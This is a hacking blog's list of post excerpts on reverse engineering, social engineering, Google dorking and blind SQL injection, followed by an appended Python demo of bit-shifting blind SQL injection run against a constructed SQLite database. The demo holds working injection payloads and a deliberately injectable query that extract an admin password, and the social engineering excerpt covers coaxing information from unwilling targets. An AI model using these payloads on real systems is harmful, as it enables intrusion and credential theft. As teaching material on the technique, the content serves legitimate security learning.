Posts

Reverse Engineering : it's not all it's cracked up to be

A lot of people are still bewildered by Reverse Engineering: what it is, and how on earth they can learn to do it. This post will, hopefully, break the mysticism around Reverse Engineering.
But before I can get into it, I need to answer this question:

What is Reverse Engineering?

Reverse engineering is the process of discovering the technological principles of a device, object, or system through analysis of its structure, function, and operation.[1] It often involves taking something (e.g., a mechanical device, electronic component, software program, or biological, chemical, or organic matter) apart and analyzing its workings in detail to be used in maintenance, or to try to make a new device or program that does the same thing without using or simply duplicating (without understanding) the original. ---- Wikipedia

What I'm going to talk about in this post is reverse engineering software.

Social Engineering : Exploiting the Human

Oh no, it's another blog post about social engineering, run away! lol. No! This post is about the way I personally approach social engineering, and the mindset you need in order to come up with new and unexpected methods of extracting information from a target.

Your goal is to get information from a target. The problem is that the target is not just going to hand that information to you (though in some rare cases it will be that easy). How do you move the target from a state where it doesn't want to give you the information to a state where it will willingly hand it over? I think about it in terms of 5 steps:

GooDork v2.2.1 : Custom User-Agents and More Results

The new version of GooDork is out. I've decided to give you guys a crash course in using the new features.

GooDork : Super Charging your Google Hacking

I recently started work on a very exciting project called GooDork. In its most basic function, this Python script allows you to run Google dorks straight from your command line.

Though its real power lies in what it allows you to do with the results of a Google dork.

Bit shifting blind injection : Simplified!

I've recently been investigating Blind SQL injection, and have become quite fond of the practice. I stumbled upon a technique documented by http://h.ackack.net (see here http://h.ackack.net/faster-blind-mysql-injection-using-bit-shifting.html) that uses bit shifting to guess, one at a time, the bits that make up the characters of the information you are trying to extract from the database.

I then came up with a modification to the method to try and make it simpler, and hopefully to allow the development of an even faster method (which I'm still working on). My method uses the XOR bitwise operation to simplify the output and operation of the attack.

Though relatively simple, these methods still require a comfortable understanding of the binary number system and can be frustrating to use. The method I'm about to show you can be performed with minimal understanding of the binary number system, because you don't need to convert in and out of binary while performing the attack.

Creativity : The only real Hacking tool

This is a post from my old blog; I wanted to add it to this one because I really enjoyed writing it :)


People use hacking tools because they believe the tools help them hack, but in actual fact, a lot of the time, all the tools are doing is helping you convince yourself that YOU are performing a hack.

How to shoot in the dark: Improved Blind SQLi

I really like this method; I feel it should replace whatever method you currently use for blind injection, if you aren't using this one already!


Blind SQL injection is all about knowing how to ask the right questions. The problem is that you have to ask a lot of questions before finding out something useful! And most of the time we are trying to find out things like passwords/password hashes, usernames or emails, and these things are simply saved as a bunch of characters in a table somewhere.

The conventional Blind injection will have you probing every character of a given value, guessing every possible character in the ASCII table until you manage to get the right one. Worst case this will take 127 requests per character!

But there is a faster way, which uses the way characters are represented to guess them faster.
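The bit-at-a-time extraction that both blind SQL injection posts above build on, as an added example that is not code from this blog or from the linked h.ackack.net post. It simulates the true/false oracle with an in-memory SQLite database so it runs offline: the users table, the admin password and the vulnerable login query are all constructed for the demo, and SQLite's unicode() stands in for MySQL's ORD(). It shows the plain shift-and-mask form of the idea (8 requests per character, no binary conversion by hand) rather than the XOR variant the post goes on to describe, and puts the conventional one-guess-per-value method beside it so the request counts can be compared.

```python
# Added example (not the blog's or h.ackack.net's code): boolean blind SQL
# injection that recovers each character one bit per request, simulated
# against an in-memory SQLite database. The users table, the secret and the
# injectable login query are constructed for the demo.
import sqlite3

# Hypothetical expression the attacker wants the database to answer about.
TARGET = "SELECT password FROM users WHERE username = 'admin'"


def build_db():
    """Constructed sample database with a hypothetical users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "S3cr3t!"), ("bob", "hunter2")])
    return conn


class Oracle:
    """Stand-in for a vulnerable login form: the username is spliced into the
    query unescaped, and all the attacker learns per request is whether a row
    came back (the classic true/false blind oracle)."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def login_page(self, username):
        self.requests += 1
        sql = f"SELECT id FROM users WHERE username = '{username}'"  # injectable on purpose
        return self.conn.execute(sql).fetchone() is not None


def bit_is_set(oracle, target_expr, pos, bit):
    """One request: is bit `bit` of the character at `pos` set?
    Asks ((ORD(char) >> bit) & 1) = 1 in SQLite spelling; the trailing
    '-- ' comments out the closing quote of the original query."""
    payload = f"admin' AND ((unicode(substr(({target_expr}),{pos},1)) >> {bit}) & 1) = 1 -- "
    return oracle.login_page(payload)


def extract_char(oracle, target_expr, pos):
    """Rebuild one character from its 8 bits, most significant first:
    always exactly 8 requests, and the bits are OR-ed straight into an int."""
    value = 0
    for bit in range(7, -1, -1):
        if bit_is_set(oracle, target_expr, pos, bit):
            value |= 1 << bit
    return chr(value)


def extract_string(oracle, target_expr, max_len=64):
    """Walk the string until a character comes back as all-zero bits.
    substr() past the end yields '', unicode('') is NULL, and every comparison
    with NULL is false, so the end of the secret reads as 0x00."""
    out = []
    for pos in range(1, max_len + 1):
        ch = extract_char(oracle, target_expr, pos)
        if ch == "\x00":
            break
        out.append(ch)
    return "".join(out)


def extract_char_linear(oracle, target_expr, pos):
    """The conventional approach the post contrasts against: try each ASCII
    value in turn. Up to 127 requests for a single character."""
    for code in range(1, 128):
        payload = f"admin' AND unicode(substr(({target_expr}),{pos},1)) = {code} -- "
        if oracle.login_page(payload):
            return chr(code)
    return None


if __name__ == "__main__":
    bitwise = Oracle(build_db())
    secret = extract_string(bitwise, TARGET)
    linear = Oracle(build_db())
    first = extract_char_linear(linear, TARGET, 1)
    print(f"bit-shifting: {secret!r} recovered in {bitwise.requests} requests")
    print(f"linear guessing of first char {first!r}: {linear.requests} requests")
```

Against the constructed database the bit-shifting loop recovers the seven-character secret, plus the terminating all-zero check, in 64 requests, while the linear method needs 83 requests for the first character alone (ASCII 'S' is 83). On a real target the same payloads go into the injectable parameter of an HTTP request, with the oracle being whatever differs between the true and false responses.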